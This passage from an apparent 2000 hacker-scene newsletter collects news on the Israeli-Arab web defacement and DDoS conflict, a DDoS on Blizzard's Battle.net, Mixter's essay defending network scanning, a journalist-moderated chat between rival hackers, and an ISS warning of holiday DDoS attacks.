      Lucent security workers were able to repel the Arab attack before it could impact the
      Lucent site. Lucent is among 13 sites listed on a Web site that encouraged Arab supporters
      to assault Israeli sites. The site called itself UNITY.
      
      Who Struck First?
      Sources in Lebanon say an Israeli site, www.wizel.com, began the cyber war in October by
      listing Palestinian and Hezbollah sites in Lebanon and elsewhere. Wizel has since
      disappeared, apparently replaced by a group calling itself Israel Hackers. The site
      encourages what it calls the army of Israeli warriors on the Net to search and destroy
      all of the Arab sites on the net. It also tells its supporters that all they need is
      a computer, a shell and [a sense of] revenge. The Israeli group is targeting the
      Palestinian Authority site, Hezbollah's El Manar television station in Lebanon, a
      Jordanian portal site and Iran's Islamic Republic News Agency (IRNA) site. Another
      pro-Israel Web page posts an image of Palestinian leader Yasser Arafat holding dynamite
      sticks. Underneath it is a cartoon of Palestinian children holding guns emblazoned with
      United Nations Children's Fund logos.
      
      Arab Hackers Work 
      Arab hackers claim to have recently downed the Israeli army Web site for at least five
      days. The army has since enlisted the U.S.-based AT&T corporation to host the site after
      the first downing, telecommunications sources here said. Israeli sites recently downed
      include the Israeli Ministries of Defense, Immigrant Absorption, Industry and Trade,
      Religious affairs and the Tel Aviv stock exchange. An Arab hacker in Beirut said,
      "We're expecting the battle to heat up from our side in the next few days. Our cyberwar
      won't stop until all of the attacked Zionist sites are destroyed."
      
      @HWA

340.0 [HWA] HOTNEW at time of print, mass hack/dos of gaming sites 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Nov 8th 3:14a EST
      
      Another Ex-HWA member in shit with the law, (this can only be expected
      of such a rapidly growing motley crew) they are wanted for DoSing several
      multiplayer game servers.. DOSING/PACKETTING FOR ANY REASON BY ANYONE IS
      VERY LAME! and HWA does NOT condone the use of DDoS tools for anything 
      other than legitimate bandwidth testing/network stress testing.  
      
      In any case this person we find out is reportedly a 15 yr old cracker
      that was miffed his battlenet account was pulled (for reasons unknown
      packetting??) they took it upon themselves to effectively down the game
      network for at least 4 days possibly disrupting service longer/more widely
      through incidental means.
      
      http://www.battle.net/forums/diablo2-realmstatus/posts/ba/1.shtml

      Subject:Battle.net Update
      From:Battle.net Sysop
      Host:Blizzard Entertainment
      Date:Tue Nov 7 18:33:30
      
                                  
      We have recently become aware of the fact that an individual, 
      group or entity has instituted a server attack on both Battle.net 
      and Blizzard's web pages. The result of this illegal activity has 
      been that many of our customers are having difficulty logging on 
      to the Battle.net game service and accessing Blizzard web pages. 
      We are in the midst of implementing a solution, but we wanted to 
      let you know that the situation is a direct result of attacks on 
      our servers, not Battle.net stability.

      The FBI and certain European law enforcement agencies have been 
      notified, and we are working in conjunction with them to identify 
      the individual. Attacks on our servers will not be tolerated, and 
      Blizzard fully intends to prosecute this individual to the 
      fullest extent of the law.

      If you have any information about the individual, group or entity 
      involved in this activity, please email hacks@blizzard.com.

      Thank you for your patience. We will post updates on the status 
      of the servers as more information is available.
      

    http://www.infoceptor.com/newspro/comments/973662921,39533,.shtml                             

    Blizzard Servers Attacked - Deathwing @ 0:25:21 EST
    It looks like the prolonged downtime of Blizzard web servers and the problems Battle.net
    has experienced was not a coincidence. The following e-mail was received directly from
    Blizzard:


    We have recently become aware of the fact that an individual, group or entity has instituted a server
    attack on both Battle.net and Blizzard's web pages. The result of this illegal activity has been that
    many of our customers are having difficulty logging on to the Battle.net game service and accessing
    Blizzard web pages. We are in the midst of implementing a solution, but we wanted to let you know
    that the situation is a direct result of attacks on our servers, not Battle.net stability.
    
    The FBI and certain European law enforcement agencies have been notified, and we are working in    
    conjunction with them to identify the individual. Attacks on our servers will not be tolerated, and
    Blizzard fully intends to prosecute this individual to the fullest extent of the law.

    If you have any information about the individual, group or entity involved in this activity, please
    email hacks@blizzard.com

    Serious stuff indeed... we certainly hope the individual will be found in the near future.

      Name: FUCK BLIZZARD 
      E-Mail: 
      I HOPE THEM MATHA FUCKERS DIE! Just kiddin 

      Name: bewf 
      E-Mail: 
      is there an award for snitching? 

      Name: 3f b33 3y3 w0n7 g37 m3 
      E-Mail: 
      who says its just one person? 
      and why lock this person(s) up, give them a job or have them help you with your problems... 

      Name: CaSPeR 
      E-Mail: don't u wish 
      Lol of course its not a joke, most of bnet splits and problems are caused by individuals,
      unfortunately i cannot tell you who they are but i do know 8) 

      Name: Deathwing 
      E-Mail: deathwing@infoceptor.com 
      This is not a joke, it was sent to all fansite members via a @Blizzard e-mail address. 

      Name: DrunkenGoliath 
      E-Mail: dave-o@telusplanet.net 
      How come Blizzard said on their page they had problems while upgrading? 

      This is a bad joke. 

      Name: Chris 
      E-Mail: 
      You better stay quiet. 
                        
      I was turned on to this story by an ex member who was apparently behind the attacks
      he claims a younger kid narqed him out to the feds and that the FBI are currently
      in search of him.
      
      Nov 8th 3:14a EST
      
      - Cruciphux                        


341.0 [IND] Paranoia Vs. Transparency And Their Effects On Internet Security
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


      Paranoia Vs. Transparency And Their Effects On Internet Security
      
      by Mixter <* mixter@newyorkoffice.com>
           (* Please use mixter@hwa-security.net to contact mixter, his mail system
            is experiencing problems, mail will forward to a new address..)
      
      
      Lately, reactions to non-intrusive probes and network activity that is
      merely unexpected are becoming increasingly hostile; a result of increasing
      amounts of incidents and security threats. From my perspective of security,
      overreactions to activities not crossing authorization and legal boundaries,
      are leading to a scenario where anyone acquiring basic information about a
      system needs to be afraid about potential consequences. Seen under a wide
      scope, this leads to network security no longer being transparent.
      
      Why is a non-transparent security situation on the Internet bad?
      Obviously, it is a big advantage to malicious intruders who have no legal
      concerns because they can conceal their identity through compromised systems,
      and a big disadvantage to security firms, admins and individuals who depend on
      a complete picture of Internet security problems to solve them. Non-malicious,
      beneficial large scale scans like the broadcast amplifier scanning projects
      are becoming harder and riskier to perform using legal resources.
      
      Network scanning and corresponding tools evolved out of a necessity to counter
      new intrusion methods after they were commonly employed by system crackers. [1]
      A scanner is simply security software that automates the process of making
      connections to a service to determine its availability and version, which allows
      drawing conclusions regarding security and potential vulnerability. Scanning a
      host is the fastest way to identify its remote vulnerabilities since it puts
      the analyst in the same perspective as an attacker, seeing all possible holes.
      
      The cause of today's widespread security problems is that people ignore
      security measures that are merely common sense. Many sites exist with gaping
      holes because their admins just don't know any better. They don't see a threat
      to their small unimportant site. Which is wrong, since the Internet is a
      network with literally millions of potential intruders, and the majority of
      intruders, no matter if kiddy or criminal, select random targets to compromise
      and use as their resources, which means that each site is at risk equally.
      Another big problem is that many admins lack the time to investigate all
      potential security issues, let alone all new vulnerabilities and advisories.
      As it is currently a part of my work to read and evaluate all information
      from the most important security lists and sites, I can say it is a task that
      takes at least one hour each and every day, and another hour if you really
      want to understand everything you read. This adds to the negative effects of
      information about security of a broad range of Internet hosts not being
      openly available. Since it is so difficult to obtain statistical information on
      widespread security issues, there is little awareness on the security issues
      that are really important, and it is a lot harder for the average admin to
      determine what security issues to check and protect against with priority
      out of the mass of security vulnerabilities and problems that are known today.
      
      I believe the problem of networks with gaping security holes has grown larger
      than most people, including most security professionals, expect. The result of
      a recent study of a research group was that 50% of all smaller enterprises are
      going to have to deal with intrusions by 2003. [2] The problem of raising
      awareness to security problems is, that security news, incidents, and
      publications of security tools and advisories only generate more awareness
      for people who already have a basic knowledge of security. But a lot of people
      responsible for Internet sites still don't have enough awareness to take the
      very fundamental steps to protect against intrusions. They will never seek
      security services themselves, either. Battling incidents and insecurity on
      the Internet is a question of reaching and contacting as many people of this
      kind as possible. In this context, large scale auditing and gathering of
      vulnerability information could be a viable tool of identifying and notifying
      these people; you could even see it as a process of mass security education.
      
      Transparency, in this context, means the possibility of freely accessing
      hosts and networks in non-harmful, non-intrusive ways for the purpose of
      security reconnaissance, without being seen and treated as malicious
      attacker. The importance of network transparency is comparable with
      the reasons for publishing advisories and exploits in the name of
      full-disclosure. The process demonstrates how exactly security issues
      are a problem, and how they can lead to incidents.
      
      Arguably, the recent popularity of Intrusion Detection Systems is not a
      bad trend. IDS capabilities can be viable for detecting and blocking
      intrusions, when they are employed by someone with sufficient background
      knowledge to make a difference between serious signs of incidents and
      harmless reconnaissance or false positives. But intrusion detection is
      not the only thing that can be relied on, it is just a part of the
      reactive protection measures, while assessment and scanning constitute
      the necessary pro-active measures.
      
      And performing pro-active security measures beyond your own network is
      justified, considering the fact that on a public network, our own security
      is always threatened by the security problems of others. Without machines
      in all parts of the world being compromised, attackers would hardly be able
      to strike anonymously and cover their tracks in a meaningful way. Spoofed
      packet attacks, DDoS agents and trojans used for relaying connections, as
      well as compromise of related hosts via password sniffing, would pose a
      less serious threat. Eliminating this threat can only be in everyone's
      interest, primarily for those admins unaware of security, who have their sites
      compromised and unknowingly used in attacks against third parties. [3]
      
      Of course, the toleration of any client activities on a host is always a
      matter of trust, a concept that I don't even want to start discussing. But
      the fact is, in the case of malicious intruders and "aggressive" scans, nobody
      has a choice of accepting them or not, since they usually come from another
      compromised machine, and even if not, there are hundreds of other potential
      attackers waiting out there for every one that you manage to track down.
      With links to the Internet you are part of a globally accessible network,
      which means the best thing to do is turning off the services you don't want
      to have accessed, or set up access controls and firewalls, which is
      encouraged, but rarely done consequently in practice.
      
      A situation where I see a direct justification of scanning is, for example,
      when doing a financial transaction over an e-commerce site. Personally,
      checking out the general security of a site, as a consumer before submitting
      billing info gives me more security than any certification can. I even see
      this as an advantage for the company offering the service. If they have poor
      security, people would stay away from them, or possibly notify them, reducing
      their costs by preventing incidents (and the accompanying lawsuits of
      customers who have fallen victim to an attack). If they have good security,
      people would know it and prefer their services.
      
      Another example is the spam problem. When receiving unsolicited mass mails in
      annoying proportions, I think it is justified to examine the third party smtp
      server, from which the mails were relayed to hundreds of addresses without
      authorization. Often, you can determine a lot of problems with such systems,
      they are mostly excellent examples of sites totally unaware of security. In
      that case, it's time to explain to the admin a bit about network security and
      third party responsibilities. I think if more people would do such things,
      even be encouraged to do it, cybercrime laws and government regulations of
      IT businesses' security would eventually become superfluous.
      
      The criminalization of scanning and the general access of network services
      that some people don't like to have accessed - already, the current laws
      can label almost any activity on a network as intrusion, because they can be
      interpreted arbitrarily - will ultimately lead to a situation where companies
      and individuals performing scans and network surveys for security relevant
      data are going to have big problems, while system crackers using illegally
      acquired resources can effectively still probe and attack any site.
      
      The situation of full-disclosure security measures is on its way to getting worse,
      perhaps a lot worse, as governments try to introduce legislation like the
      international convention on cybercrime, which would criminalize anything
      from sniffing and using crypto on your own network to the possession and
      development of security tools, let alone remote network activities. Without
      calling this trend an evil government conspiracy, you can safely say that
      people working to advance such legislation are not acting in the best interest
      of security and e-commerce, not solely out of stupidity or lack of knowledge,
      but because there are lots of people getting advantages out of criminalizing
      benevolent security practice - think of new government jobs, legal powers
      over the security industry, and the possibilities for domestic surveillance.
      
      If the government and the security community decide that consumers and users
      on the Internet, who are directly affected by the security of their peers,
      should not have the right to scan, then their only recourse will be legal.
      
      
      [1] An example of this trend is the popular paper "Improving the
       Security of Your Site by Breaking Into it" along with development
       of the first widely-used security scanner, SATAN.
       http://wzv.win.tue.nl/satan/demo/docs/admin_guide_to_cracking.html
      
      [2] See: http://www.newsbytes.com/pubNews/00/156531.html
      
      [3] Legal liability for compromised systems that unknowingly participate 
       in incidents, such as DDoS attacks, may be enforced more strictly soon:
       http://www.infoworld.com/articles/hn/xml/00/09/29/000929hnddosliability.xml
      _______________________________________________________________________________
      Security Papers - mixter.warrior2k.com/papers.html - mixter.void.ru/papers.html
      
      @HWA      
      


342.0 [IND] Trouble in the Holy land, Cyberwar and the Israeli Underground's Press Release.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Press:http://www.thestandard.com/article/article_print/0,1153,20087,00.html
        
      Back:  http://www.thestandard.com/article/display/0,1151,20087,00.html
      November 09, 2000 
  
      A Hacker With a Cause 
      Mikael Bouzaglo's cracking exploits on anti-Israeli sites are bringing him fame - and helping to
      spur a stinging counterattack by pro-Palestinian hackers. 
      By Avi Machlis 
  
      JERUSALEM - Mikael Bouzaglo talks like a soldier in the thick of crossfire as he
      recalls the battles waged from his computer. 
  
      A former firefighter in the Israeli army, Bouzaglo was discharged in September.
      But he has kept up a campaign of hacking into anti-Israeli Web sites that he was
      engaged in for several years. Last month, as violent clashes between Israel and
      Palestinians escalated throughout the West Bank and Gaza Strip, Bouzaglo
      launched his most ambitious offensive yet. 
  
      Bouzaglo set out to humiliate Hezbollah, the Lebanese guerrilla movement in
      solidarity with the Palestinian cause. He stocked up on pizza and cola and sat
      down at his keyboard. 
  
      He encountered surprisingly tough fortifications around the Hezbollah computer
      systems. After 19 hours, Bouzaglo said, he finally outwitted them and wrested
      control of a mirror site at Hizballa.org . Then, as if conquering a hill after a bloody
      battle, Bouzaglo planted on the site an Israeli flag and an audio file that played
      the Jewish state's national anthem. 
  
      "It was harder to penetrate than I expected," he says. "The Arabs are not bad in
      this virtual war." 
  
      Arab retaliation came hard and fast to this and other Israeli assaults on the Web.
      In a series of computer attacks known in technical circles as "distributed denial
      of service" attacks, Arab hackers knocked down official sites of Israel's foreign
      ministry and the Knesset, or parliament, by striking servers at Netvision, a leading
      Israeli Internet service provider. In a separate attack, for which a secretive Arab
      hacker nicknamed "m0nk3y of Arab" claimed responsibility, Netvision's mail servers
      were hobbled for about a day. 
  
      As the virtual war intensified and attracted increasing interest from the local and
      international media, Bouzaglo was torn. His instincts warned him not to go public.
      Hackers around the world operate in the shadows of cyberspace and almost
      never show their faces. But Bouzaglo dreams of becoming a politician for Israel's
      right-wing Likud party. Putting on a pressed shirt and dark tie, he took to the
      airwaves everywhere, from Israel radio and television to CNN. He since has
      become something of a celebrity and recently spoke before an Internet
      committee in the Knesset. 
  
      In the glare of the media spotlight, Bouzaglo has flip-flopped in classic politician
      style. He's now calling on his comrades to stop attacking Arab sites, but that
      doesn't mean he's showing any regret for the hacks that brought him attention. 
  
      "The Net has a lot of power," Bouzaglo says, adding that he was spurred to
      action after a Palestinian mob lynched two Israeli soldiers early in the conflict.
      "Millions of visitors from around the world are entering these sites to see Israel as
      the bad guy." 
  
      Middle East hackers often struggle to overcome a bad-guy image. Bouzaglo and
      m0nk3y of Arab might take opposite sides on politics, but both reject the label of
      cyberterrorist, preferring to see themselves as rebels with a cause. As the
      computer war shows, the Internet has empowered a generation of hackers armed
      with nothing more than Web access to challenge the online world. 
  
      It doesn't take much. According to one Israeli familiar with his work, Bouzaglo
      isn't a top-tier hacker. He didn't serve in the Israeli army's crack computer unit,
      where many Israeli computer experts cut their teeth. Instead, his service as a
      firefighter in Israel, where fires are few and far between, left him with plenty of
      time to tinker on his laptop and teach himself Java and HTML. 
  
      Since his release from the army in September, Bouzaglo has spent much of his
      time operating a Web site geared toward stopping violence in Israeli society. He
      also teaches computer classes at an elementary school and occasionally indulges
      in some hacking from his parents' apartment in Holon, just south of Tel Aviv. 
  
      The speed and potency of the Arab hackers' retaliation for cyberattacks have
      prompted Bouzaglo to disavow his hacking ways. "These attacks are pointless,"
      he says. "It's just a virtual war game." 
  
      Still, Bouzaglo does not rule out cooperating with Israeli authorities to devise
      more-sophisticated and surreptitious tactics to attack its enemies via the Web.
      So it was no surprise that pleas to his Arab adversary to end the hostilities
      sparked suspicion. 
  
      Hackers on all sides know that once a cyberwar spreads it can be tough to
      control. Arab hackers like m0nk3y of Arab relish the opportunity to fight Israelis
      on the Internet. They see it as a level playing field, in contrast to the conflict on
      the ground, in which they believe Israel is using grossly disproportionate force.
      "What we are doing now is a fair war," m0nk3y of Arab states in e-mail
      correspondence. "Brains vs. brains." 
  
      Brains on both sides quickly learned that Israel is particularly vulnerable to
      electronic warfare. Israel might be more wired than Arab countries, but it also
      has relatively small pipes that connect the country to the rest of the Internet,
      making it susceptible to attacks at choke points. 
  
      "We all know that Israeli high-tech companies have a world-class reputation, but
      this does not mean that we are weak or useless," m0nk3y of Arab states. 
  
      Bouzaglo agrees that Israel's networks are vulnerable. "In this war," he says, "the
      Arab hackers will win."
      
      
      Press:http://www.thestandard.com/article/article_print/0,1153,20102,00.html
      
      
      November 09, 2000 
  
      A Virtual Olive Branch 
      In a chat session arranged especially for The Standard, an Israeli hacker asks his two Arab
      counterparts for a truce in the Mideast cyberwar. 
      By Industry Standard Staff 
  
      JERUSALEM - As clashes raged between Israelis and Palestinians on the first
      night of November, tentative talks were taking place deep in cyberspace among
      three participants in a virtual war that has flared up alongside the Middle East
      crisis. 
  
      The prospect of meeting the enemy and the opportunity to sound off persuaded
      two Arab hackers and one Israeli hacker to face off in a chat session arranged
      exclusively for The Standard. 
  
      Participating were Mikael (Miki) Bouzaglo, a 22-year-old Israeli hacker with
      political ambitions; m0nk3y of Arab, 23, a mysterious hacker from somewhere in
      the Middle East; and Sammy, a 26-year-old U.S.-based Arab hacker. All claim to
      have played some role in the recent spate of attacks and counterattacks on
      Arab and Israeli servers. 
  
      Following are excerpts of their chat session, which was moderated by The
      Standard. The excerpts have been edited for clarity. What began as a
      surprisingly cordial exchange led to Israeli pleas for a cybertruce, shifting at
      times into the emotional and sometimes militant politics that have characterized
      the Middle East peace process for decades. Although the dialogue is choppy at
      times, it provides a rare glimpse into how the Net can be used as both a weapon
      and as a medium for fostering communication between the most bitter of
      enemies. 
  
      Avi: Do you guys have any respect, as hackers, for what you've been doing to
      each other? 
  
      Miki: Yes.
  
      Miki: I respect him.
  
      m0nk3y of Arab: I always respect my enemy, whoever he is. 
  
      Sammy: Hmmm.
  
      Miki: Because first of all, he is a person. 
  
      Both sides were asked to briefly provide details of their regional hacking
      experiences before the latest wave of violence in the Middle East crisis erupted.
      The Arabs were much more guarded than Bouzaglo. 
  
      Avi: Did you guys attack Israeli sites before? 
  
      Sammy: Probably.
  
      m0nk3y of Arab: Sites? No. Machines? Yes. 
  
      Avi: Servers, you mean?
  
      m0nk3y of Arab: You can say that. 
  
      Avi: Miki: What about you?
  
      Miki: In the past, I hacked some sites in Lebanon. 
  
      m0nk3y of Arab: Can you define which sites? 
  
      Miki: almanar mokowama etc. almanar.com.lb 
  
      m0nk3y of Arab: Got it.
  
      Miki: And more propaganda sites that call to "Kill the Israeli." 
  
      Politics snuck into the next round of dialogue - but were quickly snuffed out -
      when participants were asked whether they consider themselves part of global
      hacker culture, or a breed apart, since they are ideologically driven. 
  
      Avi: Do you feel like you fit into the general hacker scene or is it different? 
  
      Sammy: Yes, but with ethics. For a good cause. 
  
      m0nk3y of Arab: Agree.
  
      Avi: Which in this case is?
  
      Sammy: The sick propaganda.
  
      Miki: But Monkey, don't you think that the Palestinians started this war? 
  
      Miki: Believe me, we want peace. But it's not easy. 
  
      Sammy: Let's not get into politics, please. 
  
      Bouzaglo then jumps into his main message for the evening, pleading with his
      Arab counterparts to halt the online hostilities. 
  
      Miki: May I ask you something, Monkey? 
  
      m0nk3y of Arab: Do.
  
      Miki: Will you continue to attack the Netvision servers? Or do you think that we
      need to change tactics? 
  
      m0nk3y of Arab: If I stop, my mates will continue till all Palestinians get their
      rights. It's not my decision only, miki ... We are a team. 
  
      Miki: But I will tell you something. I stopped it, I stopped the attacks. 
  
      Both sides have said their main motivation for attacking has been to silence
      propaganda on the other side. But in a wired world, people can always find
      alternative ways of getting the same information. 
  
      Avi: Isn't it kind of futile to spend all your time on this? 
  
      Miki: This is why I changed tactics. I spoke on TV and radio to stop all the
      attacking. 
  
      m0nk3y of Arab: Right, but [the attacks] make it more difficult for normal people
      to find the other point of view. 
  
      Miki goes back to his cease-fire appeal. 
  
      Miki: Can you say to me that you are going to stop the virtual war? 
  
      Sammy: I thought we haven't started yet? 
  
      m0nk3y of Arab: LOL [laugh out loud] Sammy. 
  
      Sammy: No, for real.
  
      Miki: We also can do a lot of damage on the Lebanon sites and servers but - It's
      not OK and right to do it. 
  
      m0nk3y of Arab: Lebanese servers are not the only Arab servers, miki. 
  
      Miki: I know, there's a lot in the U.S. 
  
      m0nk3y of Arab: If you stop attacks from Lebanon, you will find a lot from
      others. 
  
      Sammy: Anyhow, no hacker in his right mind would do this for fun, there is an
      important cause that arose recently. We didn't start this, we didn't start the war
      in Palestine. 
  
      m0nk3y of Arab: As I said, what we did is a reaction to what's happening. 
  
      Sammy: I wish for every Arab to look deep inside of him and do what is right -
      an eye for an eye. 
  
      Miki: So I see that you want to continue this war? 
  
      Sammy: This is a small part of a big world. 
  
      m0nk3y of Arab: Miki, do you think you can control this cyberwar? 
  
      Miki: No, you and not me can stop it because we are not [responsible for] all the
      hacking. 
  
      m0nk3y of Arab: Exactly right.
  
      Raw emotions come to the fore. 
  
      m0nk3y of Arab: Miki, can you give us a general background what you were doing
      during your military service? Were you hitting Palestinians? 
  
      Miki: No, I didn't. But, dear friend, don't think that we are the bad guys. 
  
      m0nk3y of Arab: I didn't say that. What do you feel if you see an Israeli soldier
      enjoying killing a Palestinian? 
  
      Miki: We can't stop this war, but we can put it down. 
  
      m0nk3y of Arab: How, miki? Explain. 
  
      Miki: Believe me. For the Palestinians it's their independence war. You see,
      Sammy, how could anyone shoot a kid and have a smile on his face? 
  
      Sammy: Have you been watching the news? Pictures. 
  
      Miki: Tell me, did you see the crowd of Arabs from Ramallah [in the West Bank]
      lynching 2 Israeli soldiers? 
  
      Miki: Yes.
  
      Sammy: Do you remember Hitler?
  
      Miki: Yes, I do.
  
      Sammy: Arabs feel the same about the Jews. 
  
      m0nk3y of Arab: Soldiers are different than unarmed civilians. 
  
      Miki: Why do you dislike the Israelis? 
  
      m0nk3y of Arab: I hate their actions, not them personally. 
  
      Sammy: Mass killings of innocent kids is shameful and disgusting. 
  
      Miki: So you think that if you hack some Israeli sites you will fix the problem? 
  
      Miki: We need to talk.
  
      Sammy: Talk talk talk! We've done sooo much talking and no action. 
  
      Realizing he will not persuade his adversaries to call off the hacker war, Bouzaglo
      tries another tactic. Somewhat naively, he tries to find out if his chat partners
      have any information about three Israeli soldiers who were kidnapped last month
      by Hezbollah, the Lebanese guerrilla movement. M0nk3y appears to
      misunderstand and thinks Bouzaglo is trying to argue that the kidnappings justify
      Israel's actions against Palestinians. 
  
      Miki: Do you know something about the 3 Israeli soldiers? 
  
      m0nk3y of Arab: They are soldiers, not civilians, miki. 
  
      m0nk3y of Arab: I don't enjoy shooting kids. 
  
      Miki: Please, do you know something about it? 
  
      m0nk3y of Arab: No, miki.
  
      Miki: So, dear Monkey, can you get info about it? 
  
      m0nk3y of Arab: Don't take it personally, miki. 
      
      
  
      
      Israeli Underground Press release:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
      *** IMPORTANT NET SECURITY PRESS RELEASE ***
      
      To your attention:
      
      According to Wired News, CNN, Cnet and other reliable sources, phase
      three and four of the Israeli-Arab cyber war has begun. That means,
      attacks on the Israeli Internet infrastructure and the intrusion into
      Israeli e-commerce sites are the next step in what we experienced
      lately as cyber vandalism.
      
      With this information, and additional insider information, which sites
      are going to be attacked in the near future, IIU, the Israeli Internet
      Underground, decided to set up the "SODA" Project. With this project they
      want to warn about the coming danger and to announce publicly all endangered
      Israeli sites. The "SODA" Project mainly consists of a list on a public web
      site that lists all the Israeli websites which bear security vulnerabilities
      and are likely to be broken into by Islamic groups in the near future.
      
      IIU addressed 2xs Ltd. in the hope to find a company that is willing to
      support their non-profit project and to provide it with solutions.
      2xs Ltd. agreed to provide consulting and solutions free-of-charge for a
      certain time, and is also trying to motivate other Israeli security
      companies to take part in this project and to offer "first-aid" solutions
      to all the endangered sites, free-of-charge as well.
      
      IIU sees that Israeli Internet security is seriously endangered and that
      precaution must be undertaken very fast. This is a call for everybody to
      have a close look at the security situation of the Israeli Internet and
      to act.
      
      2xs Ltd. is asking you to publish this information and to help us
      motivate the Internet community and security companies in Israel,
      to provide help where necessary. Also, not only single sites are endangered,
      but the planned and upcoming attacks might have a serious impact on the
      Israeli economy, therefore concerning all of us. We thank you in advance
      for seriously looking into this matter.
      
      
      Further info:
      
      To whom it may concern,
      
      I'm forwarding you a message of the "IIU", a non-profit security group from
      Israel who have contacted me. I'm sending this on to you since they would like
      to stay anonymous. As a response to the recent attacks against sites in Israel,
      they've put up a page with vulnerability information about hosts in Israel at
      www.iiu.org.il in an attempt to stop the ongoing attacks, to generate security
      awareness and to let companies look up their host to see if they need to
      apply more security measures to their sites.
      
      Mixter
      
      
      ---------- Forwarded message ----------
      Date: Thu, 8 Nov 2000 21:03:06 +0200 (IST)
      To: mixter@newyorkoffice.com
      Subject: Important
      
      I'm writing you on behalf of the Israeli Internet Underground. We are a
      group of "white-hats" (ethical hackers) determined to protect the Israeli
      internet from attacks from malicious groups in the name of the Israeli spirit.
      
      As you may know, many sites and service providers in Israel are suffering
      from cyber attacks by certain anti-Israel groups of malicious hackers. We
      have reason to believe that attacks are shifting from Denial Of Service
      attacks to server break-ins and attempted compromise of resources such as
      e-commerce sites and large institutions, and this is going to get worse
      very soon.
      
      IIU is putting all its effort into drastically improving security for
      Israeli sites, and increasing the security awareness. Therefore, IIU has
      contributed all its resources and information about the security problems
      in the infrastructure of the Internet sites in Israel, and together with
      a local security company, 2XS Ltd., we generated a comprehensive list of
      sites and networks in Israel which are vulnerable to and could fall victim
      to digital break-ins, and a separate report with descriptions and security
      fixes for each site.
      
      We are providing this list under the following URL:
       http://www.iiu.org.il
      
      We sincerely hope you understand the importance of this project and that
      you will support us in generating awareness among Israel's Internet community
      by forwarding this mail, spreading the word about this resource, and adding a
      link or a banner to our site.
      
      Please do not hesitate to contact us regarding any questions you might have.
      
      Of course, we have taken appropriate steps to protect this critical
      information from misuse. We are providing names and network ranges of every
      vulnerable site in Israel, which can be browsed on the site.
      
      
       With thanks and regards,
      
       The Israeli Internet Underground
      
  
       @HWA
     
343.0 [IND] NOCPulse and ISS warn of impending DDoS attacks this Christmas
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      ISS' Web site is at http://www.iss.net . 
      NOCpulse's Web site is at http://www.nocpulse.com . 
      Reported by Newsbytes.com, http://www.newsbytes.com 
      
      Byline:

      Denial of Service Attacks Planned For Christmas - ISS         

      By Steve Gold, Newsbytes
      ATLANTA, GEORGIA, U.S.A., 17 Nov 2000, 12:35 PM CST 
      
      X-Force, the research and development (R&D) team of Internet 
      Security Systems [NASDAQ:ISSX] (ISS), has warned that hackers are planning 
      an online attack-fest this coming Christmas. 

      The attacks, if they occur, will take the form of distributed denial of 
      service (DDOS) invasions, a hacker flooding technique used earlier this 
      year - and since - to effectively flood out a major Web site and prevent 
      normal users from gaining access, ISS said. 

      The technique was used in February of this year when Amazon, Buy.com, CNN 
      Interactive, eBay and a number of other high-profile sites were downed by 
      hackers, apparently using DDOS applications known as "Trinoo," 
      "Stacheldraht" and "TFN2K." 

      ISS was one of the first IT security companies to issue an advisory over 
      DDOS attacks back in early February, warning Web site managers to be aware 
      that the offending applications could bring down an enterprise network or 
      e-commerce site by flooding it with large amounts of traffic. 

      In addition, the firm advised that, while there is little that sites can 
      do to prevent such attacks, companies can take steps to ease the pain, 
      including assembling an incident response team, tapping resources from the 
      organization's Internet service provider (ISP) and the computer emergency 
      response team (CERT) advisory team. 

      ISS has also advised organizations to establish links with local law 
      enforcement authorities, so that, if an attack occurs, the appropriate 
      people can be notified quickly. 

      A spokesperson for ISS told Newsbytes that the firm has detected a 
      definite pattern amongst DDOS attacks and, coupled with its knowledge of 
      the hacker community, is warning major sites to be on alert for attacks 
      this Christmas. 

      The need for preparation amongst major Web site operators is great, the 
      company says; only 10 percent of Web sites with e-commerce operations have 
      preparations in place. 

      In parallel with its warning of impending DDOS attacks this Christmas, ISS 
      has teamed up with NOCpulse, a newly launched provider of outsourced 
      Internet infrastructure management services, to deliver managed security 
      services to customers. 

      As an emerging services provider, NOCpulse plans to add ISS' managed 
      security service offerings and operational expertise to major customers, 

      As a result, ISS says that NOCpulse customers will have access to key 
      managed security services offerings as well as top notch security 
      expertise. 

      Mark Hangen, ISS' general manager of managed security services, said that 
      NOCpulse represents a new breed of managed service provider (MSP) that can 
      give companies the information they need to proactively manage their 
      Internet infrastructure. 

      Paul Santinelli, NOCpulse's founder and president, meanwhile, said that 
      the NOCpulse command center is the first Internet operational support 
      service (IOSS) designed to give customers full control over their Internet 
      infrastructure, 

      12:35 CST 

      (20001117/Press Contact: David Bridson, ISS +44-20-7626-7070; Michell 
      Norwood, ISS 678-443-6000 /WIRES TOP, ONLINE, LEGAL, 
      PC/DOTCOMATTACK/PHOTO) 

       

      -=-
      
      http://www.nocpulse.com/
      
      About NOCpulse
      NOCpulse is an Internet Operational Support Service company that provides the strategy, systems and information
      that businesses need to proactively manage their Internet infrastructure.
    
    
      How We Started
      Industry veterans from organizations including Excite@Home and Global Crossing (formerly GlobalCenter)
      founded NOCpulse in April 2000.
    
    
      Market Need
      Faced with the twin challenges of managing Internet operations while scaling for the future, web-critical
      businesses are quickly overwhelmed by the intense need for both human and capital resources. NOCpulse
      alleviates this pressure by offering an outsourced Web infrastructure management service, putting proactive control
      back in the hands of IT staff.
    
    
      The NOCpulse Command Center(SM)
      The NOCpulse Command Center is the industry's first Internet Operational Support Service (IOSS), empowering
      businesses with total control over their Internet infrastructure. By deploying the NOCpulse Command Center, a
      company will dramatically reduce the total cost associated with the operation of web environments and gain the
      intelligence to grow proactively and optimize its operations. Outsourcing Internet management operations through
      NOCpulse will allow companies to more efficiently deploy their human capital investments while sharpening their
      awareness of system operations. IT personnel can re-focus on delivering real value to the core business
      competencies of a company.
    
    
      The NORAD of the Internet
      Deep within Cheyenne Mountain, Colorado, the NORAD command and control center serves as a central collection
